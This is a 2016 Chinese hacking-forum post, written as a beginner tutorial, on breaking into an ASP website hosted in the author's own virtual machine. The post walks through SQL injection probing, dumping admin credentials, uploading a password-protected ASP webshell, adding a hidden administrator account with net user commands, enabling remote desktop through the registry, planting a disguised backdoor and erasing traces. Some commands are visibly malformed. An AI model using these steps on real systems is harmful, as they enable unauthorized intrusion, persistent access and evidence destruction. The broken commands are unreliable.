本帖最后由 薯片 于 2016-6-2 10:47 编辑
本文章仅供菜鸟参考,大神勿喷~
之前过论坛共享里下载过那个渗透系统,这回终于派上用场了!到网上下载了一个源码,然后自己搭建了一个局域网,通过主机访问虚拟机里的网页,这个大家应该都会,这里就不再叙述了,(为了方便我采用的“超级小旋风”ASP服务器软件)配置了很久时间,终于ping通了虚拟机:Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>ping 192.168.0.11
正在 Ping 192.168.0.11 具有 32 字节的数据:
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
192.168.0.11 的 Ping 统计信息:
数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
最短 = 0ms,最长 = 0ms,平均 = 0ms
C:\Users\Administrator>
额,不知道咋地了,截屏出现了问题,只能用系统自带的快捷键截屏了。。。。。。
Ok这样好像就表示搭建成功了,我用的是“三峡在线”的源码,因为这个源码可以说是漏洞百出,如果把里面的漏洞修补一遍的话,道不如重新写一个,所以作为菜鸟的我就拿来练手了。Ok,废话不多说,直接动手! 随便点击一个链接,在地址栏可以看到:asp?id= 这种类型的字符串,根据感觉来看,很有可能出现注入漏洞: 然后采用比较老套的手工注入测试,输入 and 1=1 后页面正常显示,输入 and 1=2 后就报错了,可以肯定,这个页面一定存在注入漏洞! 额,手工挨个检测费时又费力,直接上工具!不知道咋地了,把工具包移动到win7系统后很多软件不能用了,明小子就光荣下岗了,没办法只能用老掉牙的“”啊D“”好了,自我感觉明小子好用一些。
扫描出来: ------------------------------------- 检测的表段:[admin] ---------------------------------------- [user] : admin [pwd] :admin [user] : sxzx.net [pwd] : sxzx.net
额,没加密,好吧直接扫后台登录。。。
链接成功,然后可以上传一个大马,留下后门,以便以后再来。。(神经病,自己在自己电脑留后门,,,)然后上传了一个ASP大马,密码:ihonker 麻蛋,这都不行!那就先用菜刀的终端功能添加个管理员~ 运行net user $abc 123 /add添加个隐藏账号,然后运行:netlocalgroup administrators $abc /add 提升为管理权限。 也不知道红盟提供的这个系统开3389了没有,先连一下试试。 没有开放,那就用一段命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnection /t REG_DWORD /d 0 /f 尝试开启3389.
然后,又失败了,再想想其他办法。找到工具包里的:双开3389工具,切换到c盘根目录下,上传这些东西。然后再切换到虚拟终端运行: Tasklist/SVC>>c:\3389.txt,哈哈,搞定!,用3389桌面连接工具连接,输入用户名:$abc 密码:123 登录。 成功拿下服务器,因为是用虚拟机搭建的局域网,所以没有经过路由器,所以上传东西不用做映射,直接用菜刀上传就好。
然后直接上传擦除工具到d盘,通过远程桌面操作。 然后这时候再回过头来留个后门,总感觉这步晚了点。将大马改成后缀为.zip 文件。同样通过菜刀上传到d 盘,然后在远程桌面里把他剪切到网站目录下,然后改文件名为x_x.asp 额,虽然这样好像不起什么作用,但改成这样舒服些,输入地址:http://192.168.0.11/x_x.asp密码:ihonker登录,成功添加后门。 然后再清理一下痕迹。 到这就完成了,整个入侵的过程也是特别基础,并且是本地搭建的,小白们可以借鉴一下。
----薯片
|